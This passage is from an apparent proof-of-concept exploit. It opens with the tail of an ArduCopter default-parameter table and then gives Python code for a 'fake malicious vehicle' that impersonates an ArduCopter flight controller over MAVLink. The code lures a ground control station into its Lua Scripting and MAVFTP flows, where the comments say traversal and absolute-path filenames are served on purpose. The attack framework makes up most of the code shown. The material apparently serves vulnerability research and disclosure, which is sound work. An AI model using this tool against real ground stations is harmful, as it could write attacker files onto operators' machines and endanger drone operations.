RC12_TRIM 1500
RC13_DZ 0
RC13_MAX 1900
RC13_MIN 1100
RC13_OPTION 0
RC13_REVERSED 0
RC13_TRIM 1500
RC14_DZ 0
RC14_MAX 1900
RC14_MIN 1100
RC14_OPTION 0
RC14_REVERSED 0
RC14_TRIM 1500
RC15_DZ 0
RC15_MAX 1900
RC15_MIN 1100
RC15_OPTION 0
RC15_REVERSED 0
RC15_TRIM 1500
RC16_DZ 0
RC16_MAX 1900
RC16_MIN 1100
RC16_OPTION 0
RC16_REVERSED 0
RC16_TRIM 1500
RC1_DZ 20
RC1_MAX 2000
RC1_MIN 1000
RC1_OPTION 0
RC1_REVERSED 0
RC1_TRIM 1500
RC2_DZ 20
RC2_MAX 2000
RC2_MIN 1000
RC2_OPTION 0
RC2_REVERSED 0
RC2_TRIM 1500
RC3_DZ 30
RC3_MAX 2000
RC3_MIN 1000
RC3_OPTION 0
RC3_REVERSED 0
RC3_TRIM 1500
RC4_DZ 20
RC4_MAX 2000
RC4_MIN 1000
RC4_OPTION 0
RC4_REVERSED 0
RC4_TRIM 1500
RC5_DZ 0
RC5_MAX 2000
RC5_MIN 1000
RC5_OPTION 0
RC5_REVERSED 0
RC5_TRIM 1500
RC6_DZ 0
RC6_MAX 2000
RC6_MIN 1000
RC6_OPTION 0
RC6_REVERSED 0
RC6_TRIM 1500
RC7_DZ 0
RC7_MAX 2000
RC7_MIN 1000
RC7_OPTION 7
RC7_REVERSED 0
RC7_TRIM 1500
RC8_DZ 0
RC8_MAX 2000
RC8_MIN 1000
RC8_OPTION 0
RC8_REVERSED 0
RC8_TRIM 1500
RC9_DZ 0
RC9_MAX 1900
RC9_MIN 1100
RC9_OPTION 0
RC9_REVERSED 0
RC9_TRIM 1500
RCMAP_PITCH 2
RCMAP_ROLL 1
RCMAP_THROTTLE 3
RCMAP_YAW 4
RC_FS_TIMEOUT 1
RC_OPTIONS 32
RC_OVERRIDE_TIME 3
RC_PROTOCOLS 1
RC_SPEED 490
RELAY1_DEFAULT 0
RELAY1_FUNCTION 1
RELAY1_INVERTED 0
RELAY1_PIN 13
RELAY2_FUNCTION 0
RELAY3_FUNCTION 0
RELAY4_FUNCTION 0
RELAY5_FUNCTION 0
RELAY6_FUNCTION 0
RNGFND1_TYPE 0
RNGFND2_TYPE 0
RNGFND3_TYPE 0
RNGFND4_TYPE 0
RNGFND5_TYPE 0
RNGFND6_TYPE 0
RNGFND7_TYPE 0
RNGFND8_TYPE 0
RNGFND9_TYPE 0
RNGFNDA_TYPE 0
RNGFND_FILT 0.5
RPM1_TYPE 0
RPM2_TYPE 0
RSSI_TYPE 0
RTL_ALT_FINAL_M 0
RTL_ALT_M 15
RTL_ALT_TYPE 0
RTL_CLIMB_MIN_M 0
RTL_CONE_SLOPE 3
RTL_LOIT_TIME 5000
RTL_OPTIONS 0
RTL_SPEED_MS 0
SCHED_DEBUG 0
SCHED_LOOP_RATE 400
SCHED_OPTIONS 0
SCR_ENABLE 0
SERIAL0_BAUD 115
SERIAL0_PROTOCOL 2
SERIAL1_BAUD 57
SERIAL1_OPTIONS 0
SERIAL1_PROTOCOL 2
SERIAL2_BAUD 57
SERIAL2_OPTIONS 0
SERIAL2_PROTOCOL 2
SERIAL3_BAUD 230
SERIAL3_OPTIONS 0
SERIAL3_PROTOCOL 5
SERIAL4_BAUD 230
SERIAL4_OPTIONS 0
SERIAL4_PROTOCOL 5
SERIAL5_BAUD 57
SERIAL5_OPTIONS 0
SERIAL5_PROTOCOL -1
SERIAL6_BAUD 57
SERIAL6_OPTIONS 0
SERIAL6_PROTOCOL -1
SERIAL7_BAUD 57
SERIAL7_OPTIONS 0
SERIAL7_PROTOCOL -1
SERIAL_PASS1 0
SERIAL_PASS2 -1
SERIAL_PASSTIMO 15
SERVO10_FUNCTION 0
SERVO10_MAX 1900
SERVO10_MIN 1100
SERVO10_REVERSED 0
SERVO10_TRIM 1500
SERVO11_FUNCTION 0
SERVO11_MAX 1900
SERVO11_MIN 1100
SERVO11_REVERSED 0
SERVO11_TRIM 1500
SERVO12_FUNCTION 0
SERVO12_MAX 1900
SERVO12_MIN 1100
SERVO12_REVERSED 0
SERVO12_TRIM 1500
SERVO13_FUNCTION 0
SERVO13_MAX 1900
SERVO13_MIN 1100
SERVO13_REVERSED 0
SERVO13_TRIM 1500
SERVO14_FUNCTION 0
SERVO14_MAX 1900
SERVO14_MIN 1100
SERVO14_REVERSED 0
SERVO14_TRIM 1500
SERVO15_FUNCTION 0
SERVO15_MAX 1900
SERVO15_MIN 1100
SERVO15_REVERSED 0
SERVO15_TRIM 1500
SERVO16_FUNCTION 0
SERVO16_MAX 1900
SERVO16_MIN 1100
SERVO16_REVERSED 0
SERVO16_TRIM 1500
SERVO1_FUNCTION 33
SERVO1_MAX 1900
SERVO1_MIN 1100
SERVO1_REVERSED 0
SERVO1_TRIM 1500
SERVO2_FUNCTION 34
SERVO2_MAX 1900
SERVO2_MIN 1100
SERVO2_REVERSED 0
SERVO2_TRIM 1500
SERVO3_FUNCTION 35
SERVO3_MAX 1900
SERVO3_MIN 1100
SERVO3_REVERSED 0
SERVO3_TRIM 1500
SERVO4_FUNCTION 36
SERVO4_MAX 1900
SERVO4_MIN 1100
SERVO4_REVERSED 0
SERVO4_TRIM 1500
SERVO5_FUNCTION 0
SERVO5_MAX 1900
SERVO5_MIN 1100
SERVO5_REVERSED 0
SERVO5_TRIM 1500
SERVO6_FUNCTION 0
SERVO6_MAX 1900
SERVO6_MIN 1100
SERVO6_REVERSED 0
SERVO6_TRIM 1500
SERVO7_FUNCTION 0
SERVO7_MAX 1900
SERVO7_MIN 1100
SERVO7_REVERSED 0
SERVO7_TRIM 1500
SERVO8_FUNCTION 0
SERVO8_MAX 1900
SERVO8_MIN 1100
SERVO8_REVERSED 0
SERVO8_TRIM 1500
SERVO9_FUNCTION 0
SERVO9_MAX 1900
SERVO9_MIN 1100
SERVO9_REVERSED 0
SERVO9_TRIM 1500
SERVO_32_ENABLE 0
SERVO_DSHOT_ESC 0
SERVO_DSHOT_RATE 0
SERVO_FTW_MASK 0
SERVO_FTW_POLES 14
SERVO_FTW_RVMASK 0
SERVO_GPIO_MASK 0
SERVO_RATE 50
SERVO_RC_FS_MSK 0
SERVO_ROB_POSMAX 4095
SERVO_ROB_POSMIN 0
SERVO_SBUS_RATE 50
SERVO_VOLZ_MASK 0
SERVO_VOLZ_RANGE 200
SID_AXIS 0
SIMPLE 0
SIM_ACC1_BIAS_X 0
SIM_ACC1_BIAS_Y 0
SIM_ACC1_BIAS_Z 0
SIM_ACC1_RND 0
SIM_ACC1_SCAL_X 0
SIM_ACC1_SCAL_Y 0
SIM_ACC1_SCAL_Z 0
SIM_ACC2_BIAS_X 0
SIM_ACC2_BIAS_Y 0
SIM_ACC2_BIAS_Z 0
SIM_ACC2_RND 0
SIM_ACC2_SCAL_X 0
SIM_ACC2_SCAL_Y 0
SIM_ACC2_SCAL_Z 0
SIM_ACC3_BIAS_X 0
SIM_ACC3_BIAS_Y 0
SIM_ACC3_BIAS_Z 0
SIM_ACC3_RND 0
SIM_ACC3_SCAL_X 0
SIM_ACC3_SCAL_Y 0
SIM_ACC3_SCAL_Z 0
SIM_ACCEL1_FAIL 0
SIM_ACCEL2_FAIL 0
SIM_ACCEL3_FAIL 0
SIM_ACC_FAIL_MSK 0
SIM_ACC_FILE_RW 0
SIM_ACC_TRIM_X 0
SIM_ACC_TRIM_Y 0
SIM_ACC_TRIM_Z 0
SIM_ADSB_ALT 1000
SIM_ADSB_COUNT -1
SIM_ADSB_RADIUS 10000
SIM_ADSB_TX 0
SIM_ADSB_TYPES 1
SIM_ARSPD2_FAIL 0
SIM_ARSPD2_FAILP 0
SIM_ARSPD2_OFS 2013
SIM_ARSPD2_PITOT 0
SIM_ARSPD2_RATIO 1.9900000095367432
SIM_ARSPD2_RND 2
SIM_ARSPD2_SIGN 0
SIM_ARSPD_FAIL 0
SIM_ARSPD_FAILP 0
SIM_ARSPD_OFS 2013
SIM_ARSPD_PITOT 0
SIM_ARSPD_RATIO 1.9900000095367432
SIM_ARSPD_RND 2
SIM_ARSPD_SIGN 0
SIM_BAR2_DELAY 0
SIM_BAR2_DISABLE 0
SIM_BAR2_DRIFT 0
SIM_BAR2_FREEZE 0
SIM_BAR2_GLITCH 0
SIM_BAR2_RND 0.20000000298023224
SIM_BAR2_WCF_BAK 0
SIM_BAR2_WCF_DN 0
SIM_BAR2_WCF_FWD 0
SIM_BAR2_WCF_LFT 0
SIM_BAR2_WCF_RGT 0
SIM_BAR2_WCF_UP 0
SIM_BAR3_DELAY 0
SIM_BAR3_DISABLE 0
SIM_BAR3_DRIFT 0
SIM_BAR3_FREEZE 0
SIM_BAR3_GLITCH 0
SIM_BAR3_RND 0.20000000298023224
SIM_BAR3_WCF_BAK 0
SIM_BAR3_WCF_DN 0
SIM_BAR3_WCF_FWD 0
SIM_BAR3_WCF_LFT 0
SIM_BAR3_WCF_RGT 0
SIM_BAR3_WCF_UP 0
SIM_BARO_COUNT 2
SIM_BARO_DELAY 0
SIM_BARO_DISABLE 0
SIM_BARO_DRIFT 0
SIM_BARO_FREEZE 0
SIM_BARO_GLITCH 0
SIM_BARO_RND 0
SIM_BARO_WCF_BAK 0
SIM_BARO_WCF_DN 0
SIM_BARO_WCF_FWD 0
SIM_BARO_WCF_LFT 0
SIM_BARO_WCF_RGT 0
SIM_BARO_WCF_UP 0
SIM_BATT_CAP_AH 0
SIM_BATT_VOLTAGE 12.600000381469727
SIM_BAUDLIMIT_EN 0
SIM_CAN_SRV_MSK 0
SIM_CAN_TYPE1 1
SIM_CAN_TYPE2 1
SIM_CLAMP_CH 0
SIM_DRIFT_SPEED 0.05000000074505806
SIM_DRIFT_TIME 5
SIM_EFI_TYPE 0
SIM_ENGINE_FAIL 0
SIM_ENGINE_MUL 0
SIM_ESC_ARM_RPM 0
SIM_ESC_TELEM 1
SIM_FLOAT_EXCEPT 1
SIM_FLOW_DELAY 0
SIM_FLOW_ENABLE 0
SIM_FLOW_POS_X 0
SIM_FLOW_POS_Y 0
SIM_FLOW_POS_Z 0
SIM_FLOW_RATE 10
SIM_FLOW_RND 0.05000000074505806
SIM_FTOWESC_ENA 0
SIM_FTOWESC_POW 4095
SIM_GND_BEHAV -1
SIM_GPS1_ACC 0.30000001192092896
SIM_GPS1_ALT_OFS 0
SIM_GPS1_BYTELOS 0
SIM_GPS1_DRFTALT 0
SIM_GPS1_ENABLE 1
SIM_GPS1_GLTCH_X 0
SIM_GPS1_GLTCH_Y 0
SIM_GPS1_GLTCH_Z 0
SIM_GPS1_HDG 0
SIM_GPS1_HDG_OFS 0
SIM_GPS1_HZ 5
SIM_GPS1_JAM 0
SIM_GPS1_LAG_MS 100
SIM_GPS1_LCKTIME 0
SIM_GPS1_NOISE 0
SIM_GPS1_NUMSATS 10
SIM_GPS1_OPTIONS 0
SIM_GPS1_POS_X 0
SIM_GPS1_POS_Y 0
SIM_GPS1_POS_Z 0
SIM_GPS1_TYPE 1
SIM_GPS1_VERR_X 0
SIM_GPS1_VERR_Y 0
SIM_GPS1_VERR_Z 0
SIM_GPS2_ENABLE 0
SIM_GPS3_ENABLE 0
SIM_GPS4_ENABLE 0
SIM_GPS_LOG_NUM 0
SIM_GRPE_ENABLE 0
SIM_GRPE_PIN -1
SIM_GRPS_ENABLE 0
SIM_GRPS_GRAB 2000
SIM_GRPS_PIN -1
SIM_GRPS_RELEASE 1000
SIM_GRPS_REVERSE 0
SIM_GYR1_BIAS_X 0
SIM_GYR1_BIAS_Y 0
SIM_GYR1_BIAS_Z 0
SIM_GYR1_RND 0
SIM_GYR1_SCALE_X 0
SIM_GYR1_SCALE_Y 0
SIM_GYR1_SCALE_Z 0
SIM_GYR2_BIAS_X 0
SIM_GYR2_BIAS_Y 0
SIM_GYR2_BIAS_Z 0
SIM_GYR2_RND 0
SIM_GYR2_SCALE_X 0
SIM_GYR2_SCALE_Y 0
SIM_GYR2_SCALE_Z 0
SIM_GYR3_BIAS_X 0
SIM_GYR3_BIAS_Y 0
SIM_GYR3_BIAS_Z 0
SIM_GYR3_RND 0
SIM_GYR3_SCALE_X 0
SIM_GYR3_SCALE_Y 0
SIM_GYR3_SCALE_Z 0
SIM_GYR_FAIL_MSK 0
SIM_GYR_FILE_RW 0
SIM_IE24_ENABLE 0
SIM_IE24_ERROR 0
SIM_IE24_STATE -1
SIM_IMUT1_ENABLE 0
SIM_IMUT2_ENABLE 0
SIM_IMUT3_ENABLE 0
SIM_IMUT_END 45
SIM_IMUT_FIXED 0
SIM_IMUT_START 25
SIM_IMUT_TCONST 300
SIM_IMU_COUNT 2
SIM_IMU_ORIENT 0
SIM_IMU_POS_X 0
SIM_IMU_POS_Y 0
SIM_IMU_POS_Z 0
SIM_INIT_ALT_OFS 0
SIM_INIT_LAT_OFS 0
SIM_INIT_LON_OFS 0
SIM_INS_THR_MIN 0.10000000149011612
SIM_JSON_MASTER 0
SIM_LED_LAYOUT 0
SIM_LOOP_DELAY 0
SIM_MAG1_DEVID 97539
SIM_MAG1_DIA_X 0
SIM_MAG1_DIA_Y 0
SIM_MAG1_DIA_Z 0
SIM_MAG1_FAIL 0
SIM_MAG1_ODI_X 0
SIM_MAG1_ODI_Y 0
SIM_MAG1_ODI_Z 0
SIM_MAG1_OFS_X 5
SIM_MAG1_OFS_Y 13
SIM_MAG1_OFS_Z -18
SIM_MAG1_ORIENT 0
SIM_MAG1_SCALING 1
SIM_MAG2_DEVID 131874
SIM_MAG2_DIA_X 0
SIM_MAG2_DIA_Y 0
SIM_MAG2_DIA_Z 0
SIM_MAG2_FAIL 0
SIM_MAG2_ODI_X 0
SIM_MAG2_ODI_Y 0
SIM_MAG2_ODI_Z 0
SIM_MAG2_OFS_X 5
SIM_MAG2_OFS_Y 13
SIM_MAG2_OFS_Z -18
SIM_MAG2_ORIENT 0
SIM_MAG2_SCALING 1
SIM_MAG3_DEVID 263178
SIM_MAG3_DIA_X 0
SIM_MAG3_DIA_Y 0
SIM_MAG3_DIA_Z 0
SIM_MAG3_FAIL 0
SIM_MAG3_ODI_X 0
SIM_MAG3_ODI_Y 0
SIM_MAG3_ODI_Z 0
SIM_MAG3_OFS_X 5
SIM_MAG3_OFS_Y 13
SIM_MAG3_OFS_Z -18
SIM_MAG3_ORIENT 0
SIM_MAG3_SCALING 1
SIM_MAG4_DEVID 97283
SIM_MAG5_DEVID 97795
SIM_MAG6_DEVID 98051
SIM_MAG7_DEVID 0
SIM_MAG8_DEVID 0
SIM_MAG_ALY_HGT 1
SIM_MAG_ALY_X 0
SIM_MAG_ALY_Y 0
SIM_MAG_ALY_Z 0
SIM_MAG_DELAY 0
SIM_MAG_MOT_X 0
SIM_MAG_MOT_Y 0
SIM_MAG_MOT_Z 0
SIM_MAG_RND 0
SIM_MAG_SAVE_IDS 1
SIM_ODOM_ENABLE 0
SIM_OH_MASK 0
SIM_OH_RELAY_MSK -1
SIM_OPOS_ALT 584
SIM_OPOS_HDG 353
SIM_OPOS_LAT -35.36326217651367
SIM_OPOS_LNG 149.1652374267578
SIM_PARA_ENABLE 0
SIM_PARA_PIN -1
SIM_PIN_MASK 0
SIM_PLD_ALT_LMT 15
SIM_PLD_DIST_LMT 10
SIM_PLD_ENABLE 0
SIM_PLD_HEIGHT 0
SIM_PLD_LAT -35.36326217651367
SIM_PLD_LON 149.1652374267578
SIM_PLD_OPTIONS 0
SIM_PLD_ORIENT 24
SIM_PLD_RATE 100
SIM_PLD_SHIP 0
SIM_PLD_TYPE 0
SIM_PLD_YAW 353
SIM_RATE_HZ 1200
SIM_RC_CHANCOUNT 16
SIM_RC_FAIL 0
SIM_RICH_CTRL -1
SIM_RICH_ENABLE 0
SIM_SERVO_DELAY 0
SIM_SERVO_FILTER 0
SIM_SERVO_SPEED 0.14000000059604645
SIM_SHIP_DSIZE 10
SIM_SHIP_ENABLE 0
SIM_SHIP_OFS_X 0
SIM_SHIP_OFS_Y 0
SIM_SHIP_OFS_Z 0
SIM_SHIP_PSIZE 1000
SIM_SHIP_SPEED 3
SIM_SHIP_SYSID 17
SIM_SHOVE_TIME 0
SIM_SHOVE_X 0
SIM_SHOVE_Y 0
SIM_SHOVE_Z 0
SIM_SLUP_ENABLE 0
SIM_SONAR_GLITCH 0
SIM_SONAR_POS_X 0
SIM_SONAR_POS_Y 0
SIM_SONAR_POS_Z 0
SIM_SONAR_RND 0
SIM_SONAR_ROT 25
SIM_SONAR_SCALE 12.121199607849121
SIM_SPEEDUP 10
SIM_SPR_ENABLE 0
SIM_SPR_PUMP -1
SIM_SPR_SPIN -1
SIM_TA_ENABLE 1
SIM_TEMP_BFACTOR 0
SIM_TEMP_BRD_OFF 20
SIM_TEMP_START 25
SIM_TEMP_TCONST 30
SIM_TERRAIN 1
SIM_TETH_ENABLE 0
SIM_THML_SCENARI 0
SIM_TIDE_DIR 0
SIM_TIDE_SPEED 0
SIM_TIME_JITTER 0
SIM_TWIST_TIME 0
SIM_TWIST_X 0
SIM_TWIST_Y 0
SIM_TWIST_Z 0
SIM_UART_LOSS 0
SIM_VIB_FREQ_X 0
SIM_VIB_FREQ_Y 0
SIM_VIB_FREQ_Z 0
SIM_VIB_MOT_HMNC 1
SIM_VIB_MOT_MASK 0
SIM_VIB_MOT_MAX 0
SIM_VIB_MOT_MULT 1
SIM_VICON_FAIL 0
SIM_VICON_GLIT_X 0
SIM_VICON_GLIT_Y 0
SIM_VICON_GLIT_Z 0
SIM_VICON_POS_X 0
SIM_VICON_POS_Y 0
SIM_VICON_POS_Z 0
SIM_VICON_P_SD 0
SIM_VICON_QUAL 50
SIM_VICON_RATE 50
SIM_VICON_TMASK 3
SIM_VICON_VGLI_X 0
SIM_VICON_VGLI_Y 0
SIM_VICON_VGLI_Z 0
SIM_VICON_V_SD 0
SIM_VICON_YAW 0
SIM_VICON_YAWERR 0
SIM_VOLZ_ENA 0
SIM_VOLZ_FMASK 0
SIM_VOLZ_MASK 11
SIM_WAVE_AMP 0.5
SIM_WAVE_DIR 0
SIM_WAVE_ENABLE 0
SIM_WAVE_LENGTH 10
SIM_WAVE_SPEED 0.5
SIM_WIND_DIR 180
SIM_WIND_DIR_Z 0
SIM_WIND_SPD 0
SIM_WIND_T 0
SIM_WIND_TC 5
SIM_WIND_TURB 0
SIM_WIND_T_ALT 60
SIM_WIND_T_COEF 0.009999999776482582
SIM_WOW_PIN -1
SPRAY_ENABLE 0
SRTL_ACCURACY 2
SRTL_OPTIONS 0
SRTL_POINTS 300
STAT_BOOTCNT 1
STAT_DISTFLWN 0
STAT_FLTCNT 0
STAT_FLTTIME 0
STAT_RESET 1
STAT_RUNTIME 0
SUPER_SIMPLE 0
SURFTRAK_MODE 1
SURFTRAK_TC 1
TCAL_ENABLED 0
TEMP1_TYPE 0
TEMP2_TYPE 0
TEMP3_TYPE 0
TEMP_LOG 0
TERRAIN_CACHE_SZ 12
TERRAIN_ENABLE 1
TERRAIN_MARGIN 0.05000000074505806
TERRAIN_OFS_MAX 30
TERRAIN_OPTIONS 0
TERRAIN_SPACING 100
THROW_ALT_ACSND 3
THROW_ALT_DCSND 1
THROW_ALT_MAX 0
THROW_ALT_MIN 0
THROW_MOT_START 0
THROW_NEXTMODE 18
THROW_TYPE 0
THR_DZ 100
TKOFF_RPM_MAX 0
TKOFF_RPM_MIN 0
TKOFF_SLEW_TIME 2
TKOFF_THR_MAX 0.8999999761581421
TUNE 0
TUNE2 0
TUNE2_MAX 0
TUNE2_MIN 0
TUNE_MAX 0
TUNE_MIN 0
VISO_TYPE 0
VTX_ENABLE 0
WINCH_TYPE 0
WP_ACC 2.5
WP_ACC_CNR 0
WP_ACC_Z 1
WP_JERK 1
WP_NAVALT_MIN 0
WP_RADIUS_M 2
WP_RFND_USE 1
WP_SPD 10
WP_SPD_DN 1.5
WP_SPD_UP 2.5
WP_TER_MARGIN 10
WP_YAW_BEHAVIOR 2
WVANE_ENABLE 0
ZIGZ_AUTO_ENABLE 0
"""

def _parse_default_params(tsv):
    params = {}
    for line in tsv.strip().splitlines():
        name, val = line.split()
        params[name] = float(val)
    return params


class FakeVehicle:
    HEARTBEAT_HZ = 1.0

    # Full real ArduCopter 4.7.0 default param set (see _COPTER_DEFAULT_PARAMS_TSV
    # above) with a small override layer for values this PoC actually depends on:
    #
    #  * SCR_ENABLE: stock default is 0. ScriptingComponent.qml:23 does
    #    factController.getParameterFact(-1, "SCR_ENABLE", false); if that fact is
    #    null or falsy, the Lua Scripting page shows "Scripting is not supported
    #    by this version of firmware" and disables listDirectory/download --
    #    the FTP traversal sink is never reached. Must be truthy.
    #  * ARMING_CHECK / SYSID_THISMAV: read by the Safety summary tile and various
    #    setup pages but absent from the 4.7.0 default dump itself; add them so
    #    those specific lookups don't report missing.
    PARAMS = _parse_default_params(_COPTER_DEFAULT_PARAMS_TSV)
    PARAMS.update({
        "SCR_ENABLE": 1.0,
        "ARMING_CHECK": 1.0,
        "SYSID_THISMAV": 1.0,
    })

    # Looks like ArduCopter 4.5.7 (official) on a Cube Orange -- matches the
    # MP-01/02/03 PoCs so QGC's vehicle-setup / capability probes get a
    # consistent, realistic autopilot identity.
    FW_VERSION = (4 << 24) | (5 << 16) | (7 << 8) | 255      # major.minor.patch.type
    GIT_HASH = list(b"1f3a9c20")                              # 8 bytes
    BOARD_VERSION = 0x010F0000
    VENDOR_ID, PRODUCT_ID, UID = 0x2DAE, 0x1011, 0x3138353012345678

    CAPABILITIES = (
        mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_FTP
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_MISSION_FLOAT
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_PARAM_FLOAT
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_MISSION_INT
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_COMMAND_INT
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_SET_POSITION_TARGET_LOCAL_NED
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_SET_POSITION_TARGET_GLOBAL_INT
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_TERRAIN
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_FLIGHT_TERMINATION
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_COMPASS_CALIBRATION
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_MAVLINK2
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_MISSION_FENCE
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_MISSION_RALLY
    )

    BOOT_BANNER = [
        "ArduCopter V4.5.7 (1f3a9c20)",
        "ChibiOS: db580d2e",
        "CubeOrange 0042002A",
        "Frame: QUAD/X",
        "IMU0: fast sampling 8.0kHz",
        "RCOut: PWM:1-14",
    ]

    def __init__(self, conn_str, sysid=1, compid=1, verbose=True, dialect="ardupilotmega"):
        self.conn_str = conn_str
        self.sysid = sysid
        self.compid = compid
        self.verbose = verbose
        self.trace = False
        self.dialect = dialect
        self.master = None
        self._hb_thread = None
        self._rx_thread = None
        self._running = False
        self._seq_lock = threading.Lock()
        self.greeted = False
        # Instance copy: PARAM_REQUEST_READ auto-registers unknown names into
        # this dict (see _rx_loop), so it must not mutate the class attribute.
        self.PARAMS = dict(self.PARAMS)
        # MAVFTP server state: a dict of {filename: bytes} the attacker serves.
        # filenames may contain traversal / absolute-path sequences on purpose.
        self.ftp_files = {}
        self._send_lock = threading.Lock()   # serialise srcComponent restamping
        self.ftp_dir_entries = []    # list of (name, size, is_dir)
        self.ftp_dir_mtimes = {}     # name -> unix mtime (secs, UTC)
        self._ftp_sessions = {}       # session_id -> (filename, bytes)

    # -- construction --------------------------------------------------------
    @classmethod
    def from_cli(cls, title=None, extra_args=None):
        """Parse the common CLI and return a configured (unstarted) FakeVehicle.
        `extra_args(parser)` lets a PoC add its own flags before parsing."""
        p = argparse.ArgumentParser(add_help=True, description=title or "fake malicious vehicle")
        g = p.add_mutually_exclusive_group()
        g.add_argument("--listen", metavar="HOST:PORT", default="127.0.0.1:5760",
                       help="bind a TCP server the GCS connects TO (SITL-style). default 127.0.0.1:5760")
        g.add_argument("--udpout", metavar="HOST:PORT",
                       help="push UDP to a listening GCS, e.g. 127.0.0.1:14550")
        g.add_argument("--connect", metavar="STR",
                       help="raw pymavlink connection string, used verbatim")
        p.add_argument("--sysid", type=int, default=1, help="our advertised system id (default 1)")
        p.add_argument("--compid", type=int, default=1, help="our advertised component id (default 1 = autopilot)")
        p.add_argument("--quiet", action="store_true", help="less logging")
        p.add_argument("--trace", action="store_true",
                       help="dump every FTP chunk and every COMMAND_LONG. Very "
                            "noisy -- off by default so the pane stays readable.")
        if extra_args:
            extra_args(p)
        a, _ = p.parse_known_args()

        if a.connect:
            conn = a.connect
        elif a.udpout:
            conn = "udpout:" + a.udpout
        else:
            # tcpin: == we are the TCP *server* and bind; the GCS dials in.
            conn = "tcpin:" + a.listen
        self = cls(conn, sysid=a.sysid, compid=a.compid, verbose=not a.quiet)
        self.trace = getattr(a, 'trace', False)
        self._args = a
        return self

    # -- lifecycle -----------------------------------------------------------
    def start(self):
        if self.verbose:
            observe("opening attacker link: %s (advertising sysid=%d compid=%d)"
                    % (self.conn_str, self.sysid, self.compid))
            if self.conn_str.startswith("tcpin:"):
                observe("waiting for the GCS to CONNECT to us (point it at tcp:%s) ..."
                        % self.conn_str[len("tcpin:"):])
        self.master = mavutil.mavlink_connection(
            self.conn_str, source_system=self.sysid, source_component=self.compid,
            dialect=self.dialect, autoreconnect=True)
        self._running = True
        self._hb_thread = threading.Thread(target=self._heartbeat_loop, daemon=True)
        self._hb_thread.start()
        self._rx_thread = threading.Thread(target=self._rx_loop, daemon=True)
        self._rx_thread.start()
        if self.verbose:
            ok("link up; HEARTBEAT @ %.0f Hz running" % self.HEARTBEAT_HZ)
        return self

    def wait_for_gcs(self, timeout=120):
        """Block until a GCS has actually connected.

        For the tcpin (TCP-server) role this matters: pymavlink's mavtcpin.write()
        is a NO-OP until the listening socket has accept()ed a client (the accept
        happens inside recv(), which our _rx_loop drives). One-shot payload sends
        from a PoC would otherwise race the accept and be silently dropped. UDP/
        udpout roles have no accept step, so we return immediately for them.
        Returns True once connected (or for connectionless roles), False on timeout.
        """
        # mavudp / udpout have no 'port' accept handshake.
        if not self.conn_str.startswith("tcpin:"):
            time.sleep(0.3)
            return True
        deadline = time.time() + timeout
        if self.verbose:
            observe("waiting for a GCS to connect to %s ..." % self.conn_str)
        while time.time() < deadline:
            if getattr(self.master, "port", None) is not None:
                # give the link a beat to settle after accept()
                time.sleep(0.3)
                if self.verbose:
                    ok("GCS connected — sending payload")
                return True
            time.sleep(0.1)
        warn("no GCS connected within %ds" % timeout)
        return False

    def serve_forever(self):
        """Block forever (until Ctrl-C), keeping the heartbeat and FTP server alive."""
        try:
            while self._running:
                time.sleep(0.5)
        except KeyboardInterrupt:
            warn("Ctrl-C — shutting down fake vehicle")
            self.stop()

    def stop(self):
        self._running = False

    # -- heartbeat -----------------------------------------------------------
    def _heartbeat_loop(self):
        period = 1.0 / self.HEARTBEAT_HZ
        while self._running:
            try:
                # type=QUADROTOR, autopilot=ARDUPILOTMEGA so the GCS treats us as
                # a real ArduCopter vehicle and runs its full vehicle-setup logic
                # (camera/FTP/component-metadata probes etc.).
                self.master.mav.heartbeat_send(
                    mavutil.mavlink.MAV_TYPE_QUADROTOR,
                    mavutil.mavlink.MAV_AUTOPILOT_ARDUPILOTMEGA,
                    base_mode=mavutil.mavlink.MAV_MODE_FLAG_CUSTOM_MODE_ENABLED,
                    custom_mode=0,
                    system_status=mavutil.mavlink.MAV_STATE_STANDBY)
            except Exception as e:  # noqa: BLE001 — link may still be establishing
                if self.verbose:
                    warn("heartbeat send failed (link not up yet?): %s" % e)
            time.sleep(period)

    # -- receive / log what the GCS asks for --------------------------------
    def _extra_rx_hook(self, msg, t):
        """Override in a subclass. Return True if fully handled."""
        return False

    def _rx_loop(self):
        while self._running:
            try:
                msg = self.master.recv_match(blocking=True, timeout=0.5)
            except Exception:
                msg = None
                time.sleep(0.2)
            if msg is None:
                continue
            t = msg.get_type()
            if t == "BAD_DATA":
                continue
            # Subclass hook: return True to mean "handled, stop dispatching".
            if self._extra_rx_hook(msg, t):
                continue
            # QGC only builds out the full vehicle-setup flow (params,
            # capabilities, the APM Lua Scripting page) once it has seen a
            # HEARTBEAT from us; greet it the first time with a realistic
            # ArduCopter boot banner + AUTOPILOT_VERSION so it doesn't stall.
            if t == "HEARTBEAT" and not self.greeted:
                self.greeted = True
                self.send_boot_banner()
                self.send_autopilot_version()
            # Surface the interesting GCS->vehicle requests so the operator can
            # SEE the GCS taking the bait (camera probe, FTP list/open, etc.).
            if t == "FILE_TRANSFER_PROTOCOL":
                self._handle_ftp(msg)
            elif t == "PARAM_REQUEST_LIST":
                if self.verbose:
                    observe("GCS requested PARAM_REQUEST_LIST")
                for i, (name, val) in enumerate(self.PARAMS.items()):
                    self.send_param_value(name, val, count=len(self.PARAMS), index=i)
            elif t == "PARAM_REQUEST_READ":
                param_name = getattr(msg, "param_id", "")
                if isinstance(param_name, bytes):
                    param_name = param_name.decode("utf-8", "ignore")
                param_name = param_name.strip("\x00")
                if param_name:
                    # ParameterManager::refreshParameter() sends this whenever ANY
                    # setup page calls getParameterFact() for a name we haven't
                    # pre-seeded (Radio/Sensors/Flight Modes/Power/... each probe
                    # their own param set). Answering every name we're asked about
                    # -- registering it with an inert default on first sight --
                    # keeps parameterExists() true for whatever the operator clicks
                    # into, instead of re-triggering the "missing from firmware" dialog.
                    if param_name not in self.PARAMS:
                        self.PARAMS[param_name] = 0.0
